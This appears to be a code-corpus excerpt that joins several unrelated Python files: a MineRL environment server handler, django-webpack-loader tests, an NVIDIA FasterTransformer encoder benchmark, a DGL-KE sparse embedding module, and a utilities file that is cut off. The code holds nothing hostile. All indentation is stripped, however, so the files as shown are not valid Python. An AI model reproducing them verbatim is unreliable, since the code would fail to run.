self.num_envs = num_envs
self.env_pool = None
self.env_register = None
def handle_version(self, client, data):
return self.env_name
def handle_make(self, client, data):
logging.info("Make %s" % data)
if data == self.env_name:
try:
self.reserve_env(self.env_pool, self.env_register, client)
logging.info("Success")
return True
except:
logging.error("Failed - Exception in reserve_env")
return False
else:
logging.error("Failed - Environment ID mismatch: {}".format(self.env_name))
return False
def handle_close(self, client, data):
logging.info("Close")
self.release_env(self.env_register, client)
return True
def handle_step(self, client, data):
env = self.env_pool[self.env_register[client]]
try:
return env.step(data)
except Exception as e:
try:
logging.error("EXCEPTION DURING env.step, resetting...\n{}".format(e))
env.reset()
return self.handle_step(client, data)
except Exception as e:
# assume broken env
logging.error("EXCEPTION DURING env.step.reset, restarting_env...\n{}".format(e))
self.restart_env(self.env_register[client])
return self.handle_step(client, data)
def handle_reset(self, client, data):
logging.info("Reset: %s, %s" % (client, data))
env = self.env_pool[self.env_register[client]]
seed = data["seed"] if "seed" in data else None
if seed:
env.seed(data["seed"])
try:
return env.reset()
except Exception as e:
# assume broken env
logging.error("EXCEPTION DURING env.reset, restarting_env...\n{}".format(e))
return self.restart_env(self.env_register[client], seed=seed)
@staticmethod
def _make_env(env_name):
logging.info("Initializing %s" % env_name)
env = gym_sync_create(env_name)
env.reset()
return env
def restart_env(self, env_id, seed=None):
try:
env = self.env_pool[env_id]
env.close()
except:
pass
env = gym.make(self.env_name)
self.env_pool[env_id] = env
if seed is not None:
env.seed(seed)
return env.reset()
def startup_pool(self):
# startup env pool
logging.info("Starting up environment pool (%d): %s" % (self.num_envs, self.env_name))
# p = Pool(self.num_envs)
# envs = p.map(self._make_env, [self.env_name for i in range(self.num_envs)])
# env_pool = {i: envs[i] for i in range(self.num_envs)}
env_pool = {i: gym.make(self.env_name) for i in range(self.num_envs)}
env_register = {}
for env_id, env in env_pool.items():
logging.info("Resetting env...")
env.reset()
logging.info("Done")
logging.info("Ready!")
self.env_pool = env_pool
self.env_register = env_register
def reserve_env(self, pool, register, address):
self.release_env(register, address)
for env_id, env in pool.items():
if not env_id in register.values():
register[address] = env_id
logging.info("Reserved environment %d for %s" % (env_id, address))
return
raise Exception("Out of Environments!")
@staticmethod
def release_env(register, address):
if address in register:
env_id = register.pop(address)
logging.info("Released env %d used by %s" % (env_id, address))
def parse_args():
parser = argparse.ArgumentParser(description='Start environment server.')
parser.add_argument("--env", choices=["MineRLTreechop-v0", "MineRLObtainDiamond-v0", "MineRLObtainDiamondDense-v0"],
help="Environment name")
parser.add_argument("--port", type=int, default=9999, help="server port")
parser.add_argument("--poolsize", type=int, default=1, help="number of environments to keep")
return parser.parse_args()
def start(args):
handler = Handler(env_name=args.env, num_envs=args.poolsize)
handler.startup_pool()
server = EnvServer(handler=handler, port=args.port)
server.start_server()
server.listen()
if __name__ == "__main__":
args = parse_args()
start(args)
|
test_webpack.py
|
import json
import os
import time
from subprocess import call
from threading import Thread
import django
from django.conf import settings
from django.test import RequestFactory, TestCase
from django.views.generic.base import TemplateView
from django_jinja.builtins import DEFAULT_EXTENSIONS
from unittest2 import skipIf
from webpack_loader.exceptions import (
WebpackError,
WebpackLoaderBadStatsError,
WebpackLoaderTimeoutError,
WebpackBundleLookupError
)
from webpack_loader.utils import get_loader
BUNDLE_PATH = os.path.join(settings.BASE_DIR, 'assets/bundles/')
DEFAULT_CONFIG = 'DEFAULT'
class LoaderTestCase(TestCase):
def setUp(self):
self.factory = RequestFactory()
def compile_bundles(self, config, wait=None):
if wait:
time.sleep(wait)
call(['./node_modules/.bin/webpack', '--config', config])
@skipIf(django.VERSION < (1, 7),
'not supported in this django version')
def test_config_check(self):
from webpack_loader.apps import webpack_cfg_check
from webpack_loader.errors import BAD_CONFIG_ERROR
with self.settings(WEBPACK_LOADER={
'BUNDLE_DIR_NAME': 'bundles/',
'STATS_FILE': 'webpack-stats.json',
}):
errors = webpack_cfg_check(None)
expected_errors = [BAD_CONFIG_ERROR]
self.assertEqual(errors, expected_errors)
with self.settings(WEBPACK_LOADER={
'DEFAULT': {}
}):
errors = webpack_cfg_check(None)
expected_errors = []
self.assertEqual(errors, expected_errors)
def test_simple_and_css_extract(self):
self.compile_bundles('webpack.config.simple.js')
assets = get_loader(DEFAULT_CONFIG).get_assets()
self.assertEqual(assets['status'], 'done')
self.assertIn('chunks', assets)
chunks = assets['chunks']
self.assertIn('main', chunks)
self.assertEqual(len(chunks), 1)
main = chunks['main']
self.assertEqual(main[0]['path'], os.path.join(settings.BASE_DIR, 'assets/bundles/main.js'))
self.assertEqual(main[1]['path'], os.path.join(settings.BASE_DIR, 'assets/bundles/styles.css'))
def test_js_gzip_extract(self):
self.compile_bundles('webpack.config.gzipTest.js')
assets = get_loader(DEFAULT_CONFIG).get_assets()
self.assertEqual(assets['status'], 'done')
self.assertIn('chunks', assets)
chunks = assets['chunks']
self.assertIn('main', chunks)
self.assertEqual(len(chunks), 1)
main = chunks['main']
self.assertEqual(main[0]['path'], os.path.join(settings.BASE_DIR, 'assets/bundles/main.js.gz'))
self.assertEqual(main[1]['path'], os.path.join(settings.BASE_DIR, 'assets/bundles/styles.css'))
def test_static_url(self):
self.compile_bundles('webpack.config.publicPath.js')
assets = get_loader(DEFAULT_CONFIG).get_assets()
self.assertEqual(assets['status'], 'done')
self.assertEqual(assets['publicPath'], 'http://custom-static-host.com/')
def test_code_spliting(self):
self.compile_bundles('webpack.config.split.js')
assets = get_loader(DEFAULT_CONFIG).get_assets()
self.assertEqual(assets['status'], 'done')
self.assertIn('chunks', assets)
chunks = assets['chunks']
self.assertIn('main', chunks)
self.assertEquals(len(chunks), 2)
main = chunks['main']
self.assertEqual(main[0]['path'], os.path.join(settings.BASE_DIR, 'assets/bundles/main.js'))
vendor = chunks['vendor']
self.assertEqual(vendor[0]['path'], os.path.join(settings.BASE_DIR, 'assets/bundles/vendor.js'))
def test_templatetags(self):
self.compile_bundles('webpack.config.simple.js')
self.compile_bundles('webpack.config.app2.js')
view = TemplateView.as_view(template_name='home.html')
request = self.factory.get('/')
result = view(request)
self.assertIn('<link type="text/css" href="/static/bundles/styles.css" rel="stylesheet" />', result.rendered_content)
self.assertIn('<script type="text/javascript" src="/static/bundles/main.js" async charset="UTF-8"></script>', result.rendered_content)
self.assertIn('<link type="text/css" href="/static/bundles/styles-app2.css" rel="stylesheet" />', result.rendered_content)
self.assertIn('<script type="text/javascript" src="/static/bundles/app2.js" ></script>', result.rendered_content)
self.assertIn('<img src="/static/my-image.png"/>', result.rendered_content)
view = TemplateView.as_view(template_name='only_files.html')
result = view(request)
self.assertIn("var contentCss = '/static/bundles/styles.css'", result.rendered_content)
self.assertIn("var contentJS = '/static/bundles/main.js'", result.rendered_content)
self.compile_bundles('webpack.config.publicPath.js')
view = TemplateView.as_view(template_name='home.html')
request = self.factory.get('/')
result = view(request)
self.assertIn('<img src="http://custom-static-host.com/my-image.png"/>', result.rendered_content)
def test_jinja2(self):
self.compile_bundles('webpack.config.simple.js')
self.compile_bundles('webpack.config.app2.js')
view = TemplateView.as_view(template_name='home.jinja')
if django.VERSION >= (1, 8):
settings = {
'TEMPLATES': [
{
"BACKEND": "django_jinja.backend.Jinja2",
"APP_DIRS": True,
"OPTIONS": {
"match_extension": ".jinja",
"extensions": DEFAULT_EXTENSIONS + [
"webpack_loader.contrib.jinja2ext.WebpackExtension",
]
}
},
]
}
else:
settings = {
'TEMPLATE_LOADERS': (
'django_jinja.loaders.FileSystemLoader',
'django_jinja.loaders.AppLoader',
),
}
with self.settings(**settings):
request = self.factory.get('/')
result = view(request)
self.assertIn('<link type="text/css" href="/static/bundles/styles.css" rel="stylesheet" />', result.rendered_content)
self.assertIn('<script type="text/javascript" src="/static/bundles/main.js" async charset="UTF-8"></script>', result.rendered_content)
def test_reporting_errors(self):
self.compile_bundles('webpack.config.error.js')
try:
get_loader(DEFAULT_CONFIG).get_bundle('main')
except WebpackError as e:
self.assertIn("Cannot resolve module 'the-library-that-did-not-exist'", str(e))
def test_missing_bundle(self):
missing_bundle_name = 'missing_bundle'
self.compile_bundles('webpack.config.simple.js')
try:
get_loader(DEFAULT_CONFIG).get_bundle(missing_bundle_name)
except WebpackBundleLookupError as e:
self.assertIn('Cannot resolve bundle {0}'.format(missing_bundle_name), str(e))
def test_missing_stats_file(self):
stats_file = settings.WEBPACK_LOADER[DEFAULT_CONFIG]['STATS_FILE']
if os.path.exists(stats_file):
os.remove(stats_file)
try:
get_loader(DEFAULT_CONFIG).get_assets()
except IOError as e:
expected = (
'Error reading {0}. Are you sure webpack has generated the '
'file and the path is correct?'
).format(stats_file)
self.assertIn(expected, str(e))
def test_timeouts(self):
with self.settings(DEBUG=True):
with open(
settings.WEBPACK_LOADER[DEFAULT_CONFIG]['STATS_FILE'], 'w'
) as stats_file:
stats_file.write(json.dumps({'status': 'compiling'}))
loader = get_loader(DEFAULT_CONFIG)
loader.config['TIMEOUT'] = 0.1
with self.assertRaises(WebpackLoaderTimeoutError):
loader.get_bundle('main')
def test_bad_status_in_production(self):
with open(
settings.WEBPACK_LOADER[DEFAULT_CONFIG]['STATS_FILE'], 'w'
) as stats_file:
stats_file.write(json.dumps({'status': 'unexpected-status'}))
try:
get_loader(DEFAULT_CONFIG).get_bundle('main')
except WebpackLoaderBadStatsError as e:
self.assertIn((
"The stats file does not contain valid data. Make sure "
"webpack-bundle-tracker plugin is enabled and try to run"
" webpack again."
), str(e))
def test_request_blocking(self):
# FIXME: This will work 99% time but there is no garauntee with the
# 4 second thing. Need a better way to detect if request was blocked on
# not.
wait_for = 3
view = TemplateView.as_view(template_name='home.html')
with self.settings(DEBUG=True):
open(settings.WEBPACK_LOADER[DEFAULT_CONFIG]['STATS_FILE'], 'w').write(json.dumps({'status': 'compiling'}))
then = time.time()
request = self.factory.get('/')
result = view(request)
t = Thread(target=self.compile_bundles, args=('webpack.config.simple.js', wait_for))
t2 = Thread(target=self.compile_bundles, args=('webpack.config.app2.js', wait_for))
t.start()
t2.start()
result.rendered_content
elapsed = time.time() - then
t.join()
t2.join()
self.assertTrue(elapsed > wait_for)
with self.settings(DEBUG=False):
self.compile_bundles('webpack.config.simple.js')
self.compile_bundles('webpack.config.app2.js')
then = time.time()
request = self.factory.get('/')
result = view(request)
result.rendered_content
elapsed = time.time() - then
self.assertTrue(elapsed < wait_for)
|
encoder_sample.py
|
# Copyright (c) 2019-2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
This is a sample code to demonstrate how to use the TensorFlow custom op with
FasterTransformer library in encoder.
This sample code builds a BERT transformer model by TensorFlow and TensorFlow
custom op. Then compare the maximum difference of them to verify the correctness
of FasterTransformer.
Users are also able to use this sample code to test the average forward time of
TensorFlow and FasterTransformer.
'''
import copy
import tensorflow as tf
import numpy as np
import argparse
import time
from utils.common import TransformerArgument
from utils.common import time_test
from utils.common import cross_check
from utils.encoder import tf_encoder
from utils.encoder import op_encoder
from utils.encoder import build_sequence_mask
import threading
def encoder_sample(args_dict):
print("\n=============== Argument ===============")
for key in args_dict:
print("{}: {}".format(key, args_dict[key]))
print("========================================")
np.random.seed(1)
tf.set_random_seed(1)
batch_size = args_dict['batch_size']
num_layer = args_dict['num_layer']
max_seq_len = args_dict['max_seq_len']
avg_seq_len = args_dict['avg_seq_len']
head_num = args_dict['head_number']
size_per_head = args_dict['size_per_head']
tf_datatype = tf.float32
np_datatype = np.float32
atol_threshold = 3e-5
int8_mode = args_dict['int8_mode']
allow_gemm_test = True if args_dict['allow_gemm_test'].lower() == "true" else False
if args_dict['data_type'] == "fp16":
tf_datatype = tf.float16
np_datatype = np.float16
atol_threshold = 3e-2
hidden_dim = head_num * size_per_head
sequence_length = np.random.randint(1, max_seq_len + 1, size=batch_size)
if avg_seq_len != -1:
# This means we use "remove_padding" and set other average sequence length
sequence_length = np.ones(batch_size) * avg_seq_len
else:
sequence_length = np.ones(batch_size) * (max_seq_len / 2)
sequence_length = sequence_length.astype(np.int32)
from_data = np.random.randn(batch_size, max_seq_len, hidden_dim)
from_tensor = tf.convert_to_tensor(from_data, dtype=tf_datatype)
attention_mask = build_sequence_mask(sequence_length, num_heads=head_num, maximum_length=max_seq_len, dtype=tf_datatype)
encoder_args = TransformerArgument(beam_width=1,
head_num=head_num,
size_per_head=size_per_head,
num_layer=num_layer,
dtype=tf_datatype,
remove_padding=False,
int8_mode=int8_mode,
allow_gemm_test=allow_gemm_test)
eff_encoder_args = copy.deepcopy(encoder_args)
eff_encoder_args.remove_padding = True
tf_encoder_result = tf_encoder(input_tensor=from_tensor,
encoder_args=encoder_args,
attention_mask=attention_mask)
encoder_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
encoder_variables_dict = {}
for v in encoder_vars:
encoder_variables_dict[v.name] = v
op_encoder_result = op_encoder(inputs=from_tensor,
encoder_args=encoder_args,
attention_mask=attention_mask,
encoder_vars_dict=encoder_variables_dict,
sequence_length=sequence_length)
eff_encoder_result = op_encoder(inputs=from_tensor,
encoder_args=eff_encoder_args,
attention_mask=attention_mask,
encoder_vars_dict=encoder_variables_dict,
sequence_length=sequence_length)
'''
Because FasterTransformer skip some computation for the padding parts,
if we do not mask these parts, the cross check result would be wrong.
'''
tf_encoder_result = tf_encoder_result * tf.expand_dims(tf.sequence_mask(sequence_length, maxlen=max_seq_len, dtype=tf_datatype), axis=-1)
op_encoder_result = op_encoder_result * tf.expand_dims(tf.sequence_mask(sequence_length, maxlen=max_seq_len, dtype=tf_datatype), axis=-1)
eff_encoder_result = eff_encoder_result * tf.expand_dims(tf.sequence_mask(sequence_length, maxlen=max_seq_len, dtype=tf_datatype), axis=-1)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1
with tf.Session(config=config) as sess:
sess.run(tf.global_variables_initializer())
for idx, name in enumerate(encoder_variables_dict):
print((str(idx) + " " + str(name) + " " +
str(encoder_variables_dict[name].shape)) + " " + str(encoder_variables_dict[name].dtype))
print("#################################")
tf_encoder_result_val = sess.run(tf_encoder_result)
op_encoder_result_val = sess.run(op_encoder_result)
eff_encoder_result_val = sess.run(eff_encoder_result)
cross_check("Encoder TF v.s. FT with tensor input", tf_encoder_result_val, op_encoder_result_val, atol_threshold)
cross_check("Encoder TF v.s. EFF-FT with tensor input", tf_encoder_result_val, eff_encoder_result_val, atol_threshold)
op_diff = abs(tf_encoder_result_val.reshape([-1]) - op_encoder_result_val.reshape([-1]))
eff_diff = abs(tf_encoder_result_val.reshape([-1]) - eff_encoder_result_val.reshape([-1]))
max_diff = max(op_diff.max(), eff_diff.max())
ite = 50
def _cond(from_tensor):
return tf.constant(True)
def _ft_body(from_tensor):
op_encoder_result = op_encoder(inputs=from_tensor,
encoder_args=encoder_args,
attention_mask=attention_mask,
encoder_vars_dict=encoder_variables_dict,
sequence_length=sequence_length)
return op_encoder_result
def _eff_body(from_tensor):
eff_encoder_result = op_encoder(inputs=from_tensor,
encoder_args=eff_encoder_args,
attention_mask=attention_mask,
encoder_vars_dict=encoder_variables_dict,
sequence_length=sequence_length)
return eff_encoder_result
def _tf_body(from_tensor):
tf_encoder_result = tf_encoder(input_tensor=from_tensor,
encoder_args=encoder_args,
attention_mask=attention_mask)
return tf_encoder_result
tf_while_tensor = tf.while_loop(_cond,
_tf_body,
loop_vars=[from_tensor],
back_prop=False,
maximum_iterations=ite)
ft_while_tensor = tf.while_loop(_cond,
_ft_body,
loop_vars=[from_tensor],
back_prop=False,
maximum_iterations=ite)
eff_while_tensor = tf.while_loop(_cond,
_eff_body,
loop_vars=[from_tensor],
back_prop=False,
maximum_iterations=ite)
if args_dict['test_time'] == 1:
# tf_time = time_test(sess, tf_encoder_result, ite)
# ft_time = time_test(sess, op_encoder_result, ite)
# eff_time = time_test(sess, eff_encoder_result, ite)
# Using while loop to run 'ite' times to ignore the overheads of memory copy and model preprocess.
# We use these times as the profiling results.
tf_while_time = time_test(sess, tf_while_tensor, 1) / ite # while_loop has run ite times
time.sleep(60)
ft_while_time = time_test(sess, ft_while_tensor, 1) / ite # while_loop has run ite times
time.sleep(60)
eff_while_time = time_test(sess, eff_while_tensor, 1) / ite # while_loop has run ite times
time.sleep(60)
ft_type = args_dict['data_type'].upper()
if int8_mode != 0:
ft_type = "INT8-v{}".format(int8_mode)
# print("[INFO] batch_size {} max_seq_len {} precision {} {} layer TF-time {:6.2f} ms".format(batch_size, max_seq_len, args_dict['data_type'].upper(), num_layer, tf_time))
# print("[INFO] batch_size {} max_seq_len {} precision {} {} layer FT-OP-time {:6.2f} ms".format(batch_size, max_seq_len, ft_type, num_layer, ft_time))
# print("[INFO] batch_size {} max_seq_len {} precision {} {} layer EFF-OP-time {:6.2f} ms".format(batch_size, max_seq_len, ft_type, num_layer, eff_time))
print("[INFO] batch_size {} max_seq_len {} precision {} {} layer TF-while-time {:6.2f} ms ( {} iterations)".format(batch_size, max_seq_len, args_dict['data_type'].upper(), num_layer, tf_while_time, ite))
print("[INFO] batch_size {} max_seq_len {} precision {} {} layer FT-OP-while-time {:6.2f} ms ( {} iterations)".format(batch_size, max_seq_len, ft_type, num_layer, ft_while_time, ite))
print("[INFO] batch_size {} max_seq_len {} precision {} {} layer EFF-OP-while-time {:6.2f} ms ( {} iterations)".format(batch_size, max_seq_len, ft_type, num_layer, eff_while_time, ite))
if args_dict['thread_num'] > 1:
# Multi-threading demonstration
thread_list = []
thread_num = args_dict['thread_num']
def run():
ft_while_time = time_test(sess, ft_while_tensor, 1) / ite # while_loop has run ite times
print("[INFO] batch_size {} max_seq_len {} {} layer FT-OP-while-time {:6.2f} ms with {} threads".format(batch_size,
max_seq_len, num_layer, ft_while_time, thread_num))
for i in range(thread_num):
thread_list.append(threading.Thread(target=run, name="RunFT"))
for t in thread_list:
t.start()
for t in thread_list:
t.join()
return max_diff
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-batch', '--batch_size', type=int, default=4, metavar='NUMBER',
help='batch size (default: 4)')
parser.add_argument('-l', '--num_layer', type=int, default=12, metavar='NUMBER',
help='number of layers (default: 12)')
parser.add_argument('-s', '--max_seq_len', type=int, default=32, metavar='NUMBER',
help='max sequence length (default: 32)')
parser.add_argument('-n', '--head_number', type=int, default=12, metavar='NUMBER',
help='head number (default: 12)')
parser.add_argument('-size', '--size_per_head', type=int, default=64, metavar='NUMBER',
help='size per head (default: 64)')
parser.add_argument('-d', '--data_type', type=str, default="fp32", metavar='STRING',
help='data type (default: fp32)', choices=['fp32', 'fp16'])
parser.add_argument('-int8_mode', '--int8_mode', type=int, default=0, metavar='NUMBER',
help='int8 mode (default: 0)', choices=[0, 1, 2])
parser.add_argument('-allow_gemm_test', '--allow_gemm_test', type=str, default="False", metavar='BOOL',
help='whether allow gemm test inside FT (default: False)', choices=["True", "False"])
parser.add_argument('-time', '--test_time', type=int, default=0, metavar='BOOL',
help='test the time or not. (default: False (0)), True is 1.',
choices=[0, 1])
parser.add_argument('-avg_seq', '--avg_seq_len', type=int, default=-1, metavar='NUMBER',
help='average sequence length (default: -1)')
parser.add_argument('-thread_num', '--thread_num', type=int, default=1, metavar='int',
help='Testing multithread if thread_num > 1.')
args = parser.parse_args()
encoder_sample(vars(args))
|
tensor_models.py
|
# -*- coding: utf-8 -*-
#
# tensor_models.py
#
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
KG Sparse embedding
"""
import os
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as functional
import torch.nn.init as INIT
import torch.multiprocessing as mp
from torch.multiprocessing import Queue
from _thread import start_new_thread
import traceback
from functools import wraps
from .. import *
logsigmoid = functional.logsigmoid
def get_dev(gpu):
return th.device('cpu') if gpu < 0 else th.device('cuda:' + str(gpu))
def get_device(args):
return th.device('cpu') if args.gpu[0] < 0 else th.device('cuda:' + str(args.gpu[0]))
none = lambda x : x
norm = lambda x, p: x.norm(p=p)**p
get_scalar = lambda x: x.detach().item()
reshape = lambda arr, x, y: arr.view(x, y)
cuda = lambda arr, gpu: arr.cuda(gpu)
def l2_dist(x, y, pw=False):
if pw is False:
x = x.unsqueeze(1)
y = y.unsqueeze(0)
return -th.norm(x-y, p=2, dim=-1)
def l1_dist(x, y, pw=False):
if pw is False:
x = x.unsqueeze(1)
y = y.unsqueeze(0)
return -th.norm(x-y, p=1, dim=-1)
def dot_dist(x, y, pw=False):
if pw is False:
x = x.unsqueeze(1)
y = y.unsqueeze(0)
return th.sum(x * y, dim=-1)
def cosine_dist(x, y, pw=False):
score = dot_dist(x, y, pw)
x = x.norm(p=2, dim=-1)
y = y.norm(p=2, dim=-1)
if pw is False:
x = x.unsqueeze(1)
y = y.unsqueeze(0)
return score / (x * y)
def extended_jaccard_dist(x, y, pw=False):
score = dot_dist(x, y, pw)
x = x.norm(p=2, dim=-1)**2
y = y.norm(p=2, dim=-1)**2
if pw is False:
x = x.unsqueeze(1)
y = y.unsqueeze(0)
return score / (x + y - score)
def thread_wrapped_func(func):
"""Wrapped func for torch.multiprocessing.Process.
With this wrapper we can use OMP threads in subprocesses
otherwise, OMP_NUM_THREADS=1 is mandatory.
How to use:
@thread_wrapped_func
def func_to_wrap(args ...):
"""
@wraps(func)
def decorated_function(*args, **kwargs):
queue = Queue()
def _queue_result():
exception, trace, res = None, None, None
try:
res = func(*args, **kwargs)
except Exception as e:
exception = e
trace = traceback.format_exc()
queue.put((res, exception, trace))
start_new_thread(_queue_result, ())
result, exception, trace = queue.get()
if exception is None:
return result
else:
assert isinstance(exception, Exception)
raise exception.__class__(trace)
return decorated_function
@thread_wrapped_func
def async_update(args, emb, queue):
"""Asynchronous embedding update for entity embeddings.
How it works:
1. trainer process push entity embedding update requests into the queue.
2. async_update process pull requests from the queue, calculate
the gradient state and gradient and write it into entity embeddings.
Parameters
----------
args :
Global confis.
emb : ExternalEmbedding
The entity embeddings.
queue:
The request queue.
"""
th.set_num_threads(args.num_thread)
while True:
(grad_indices, grad_values, gpu_id) = queue.get()
clr = emb.args.lr
if grad_indices is None:
return
with th.no_grad():
grad_sum = (grad_values * grad_values).mean(1)
device = emb.state_sum.device
if device != grad_indices.device:
grad_indices = grad_indices.to(device)
if device != grad_sum.device:
grad_sum = grad_sum.to(device)
emb.state_sum.index_add_(0, grad_indices, grad_sum)
std = emb.state_sum[grad_indices] # _sparse_mask
if gpu_id >= 0:
std = std.cuda(gpu_id)
std_values = std.sqrt_().add_(1e-10).unsqueeze(1)
tmp = (-clr * grad_values / std_values)
if tmp.device != device:
tmp = tmp.to(device)
emb.emb.index_add_(0, grad_indices, tmp)
class InferEmbedding:
def __init__(self, device):
self.device = device
def load(self, path, name):
"""Load embeddings.
Parameters
----------
path : str
Directory to load the embedding.
name : str
Embedding name.
"""
file_name = os.path.join(path, name+'.npy')
self.emb = th.Tensor(np.load(file_name))
def __call__(self, idx):
return self.emb[idx].to(self.device)
class ExternalEmbedding:
"""Sparse Embedding for Knowledge Graph
It is used to store both entity embeddings and relation embeddings.
Parameters
----------
args :
Global configs.
num : int
Number of embeddings.
dim : int
Embedding dimention size.
device : th.device
Device to store the embedding.
"""
def __init__(self, args, num, dim, device):
self.gpu = args.gpu
self.args = args
self.num = num
self.trace = []
self.emb = th.empty(num, dim, dtype=th.float32, device=device)
self.state_sum = self.emb.new().resize_(self.emb.size(0)).zero_()
self.state_step = 0
self.has_cross_rel = False
# queue used by asynchronous update
self.async_q = None
# asynchronous update process
self.async_p = None
def init(self, emb_init):
"""Initializing the embeddings.
Parameters
----------
emb_init : float
The intial embedding range should be [-emb_init, emb_init].
"""
INIT.uniform_(self.emb, -emb_init, emb_init)
INIT.zeros_(self.state_sum)
def setup_cross_rels(self, cross_rels, global_emb):
cpu_bitmap = th.zeros((self.num,), dtype=th.bool)
for i, rel in enumerate(cross_rels):
cpu_bitmap[rel] = 1
self.cpu_bitmap = cpu_bitmap
self.has_cross_rel = True
self.global_emb = global_emb
def get_noncross_idx(self, idx):
cpu_mask = self.cpu_bitmap[idx]
gpu_mask = ~cpu_mask
return idx[gpu_mask]
def share_memory(self):
"""Use torch.tensor.share_memory_() to allow cross process tensor access
"""
self.emb.share_memory_()
self.state_sum.share_memory_()
def __call__(self, idx, gpu_id=-1, trace=True):
""" Return sliced tensor.
Parameters
----------
idx : th.tensor
Slicing index
gpu_id : int
Which gpu to put sliced data in.
trace : bool
If True, trace the computation. This is required in training.
If False, do not trace the computation.
Default: True
"""
if self.has_cross_rel:
cpu_idx = idx.cpu()
cpu_mask = self.cpu_bitmap[cpu_idx]
cpu_idx = cpu_idx[cpu_mask]
cpu_idx = th.unique(cpu_idx)
if cpu_idx.shape[0] != 0:
cpu_emb = self.global_emb.emb[cpu_idx]
self.emb[cpu_idx] = cpu_emb.cuda(gpu_id)
s = self.emb[idx]
if gpu_id >= 0:
s = s.cuda(gpu_id)
# During the training, we need to trace the computation.
# In this case, we need to record the computation path and compute the gradients.
if trace:
data = s.clone().detach().requires_grad_(True)
self.trace.append((idx, data))
else:
data = s
return data
def update(self, gpu_id=-1):
""" Update embeddings in a sparse manner
Sparse embeddings are updated in mini batches. we maintains gradient states for
each embedding so they can be updated separately.
Parameters
----------
gpu_id : int
Which gpu to accelerate the calculation. if -1 is provided, cpu is used.
"""
self.state_step += 1
with th.no_grad():
for idx, data in self.trace:
grad = data.grad.data
clr = self.args.lr
#clr = self.args.lr / (1 + (self.state_step - 1) * group['lr_decay'])
# the update is non-linear so indices must be unique
grad_indices = idx
grad_values = grad
if self.async_q is not None:
grad_indices.share_memory_()
grad_values.share_memory_()
self.async_q.put((grad_indices, grad_values, gpu_id))
else:
grad_sum = (grad_values * grad_values).mean(1)
device = self.state_sum.device
if device != grad_indices.device:
grad_indices = grad_indices.to(device)
if device != grad_sum.device:
grad_sum = grad_sum.to(device)
if self.has_cross_rel:
cpu_mask = self.cpu_bitmap[grad_indices]
cpu_idx = grad_indices[cpu_mask]
if cpu_idx.shape[0] > 0:
cpu_grad = grad_values[cpu_mask]
cpu_sum = grad_sum[cpu_mask].cpu()
cpu_idx = cpu_idx.cpu()
self.global_emb.state_sum.index_add_(0, cpu_idx, cpu_sum)
std = self.global_emb.state_sum[cpu_idx]
if gpu_id >= 0:
std = std.cuda(gpu_id)
std_values = std.sqrt_().add_(1e-10).unsqueeze(1)
tmp = (-clr * cpu_grad / std_values)
tmp = tmp.cpu()
self.global_emb.emb.index_add_(0, cpu_idx, tmp)
self.state_sum.index_add_(0, grad_indices, grad_sum)
std = self.state_sum[grad_indices] # _sparse_mask
if gpu_id >= 0:
std = std.cuda(gpu_id)
std_values = std.sqrt_().add_(1e-10).unsqueeze(1)
tmp = (-clr * grad_values / std_values)
if tmp.device != device:
tmp = tmp.to(device)
# TODO(zhengda) the overhead is here.
self.emb.index_add_(0, grad_indices, tmp)
self.trace = []
def create_async_update(self):
"""Set up the async update subprocess.
"""
self.async_q = Queue(1)
self.async_p = mp.Process(target=async_update, args=(self.args, self, self.async_q))
self.async_p.start()
def finish_async_update(self):
"""Notify the async update subprocess to quit.
"""
self.async_q.put((None, None, None))
self.async_p.join()
def curr_emb(self):
"""Return embeddings in trace.
"""
data = [data for _, data in self.trace]
return th.cat(data, 0)
def save(self, path, name):
"""Save embeddings.
Parameters
----------
path : str
Directory to save the embedding.
name : str
Embedding name.
"""
file_name = os.path.join(path, name+'.npy')
np.save(file_name, self.emb.cpu().detach().numpy())
def load(self, path, name):
"""Load embeddings.
Parameters
----------
path : str
Directory to load the embedding.
name : str
Embedding name.
"""
file_name = os.path.join(path, name+'.npy')
self.emb = th.Tensor(np.load(file_name))
|
utils.py
|
# coding=utf-8
"""Some util functions/classes."""
import random
import itertools
import math
import threading
import sys
import time
import os
import psutil
import operator
import cv2
# import commands
if sys.version_info > (3, 0):
import subprocess as commands
else:
import commands
from operator import mul
# from itertools import izip_longest
import itertools
from collections import defaultdict
import numpy as np
import pycocotools.mask as cocomask
# these pycocotools guys will cause
# 'Unable to init server: Could not connect: Connection refused'
# for python 3
# so need this
import matplotlib
matplotlib.use("Agg")
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
def tlwh_intersection(tlwh1, tlwh2):
# compute intersection area / area of tlwh2
box1_left, box1_top, box1_w, box1_h = tlwh1
box2_left, box2_top, box2_w, box2_h = tlwh2
box1_bottom, box1_right = box1_left + box1_w, box1_top + box1_h
box2_bottom, box2_right = box2_left + box2_w, box2_top + box2_h
tlwh2_area = box2_w * box2_h
tlbr1 = [box1_left, box1_top, box1_bottom, box1_right]
tlbr2 = [box2_left, box2_top, box2_bottom, box2_right]
xx1 = np.maximum(tlbr1[0], tlbr2[0])
yy1 = np.maximum(tlbr1[1], tlbr2[1])
xx2 = np.minimum(tlbr1[2], tlbr2[2])
yy2 = np.minimum(tlbr1[3], tlbr2[3])
w = np.maximum(0, xx2 - xx1)
h = np.maximum(0, yy2 - yy1)
return (w * h) / tlwh2_area
def expand_tlwh(tlwh, w_p=0.1, h_p=0.1):
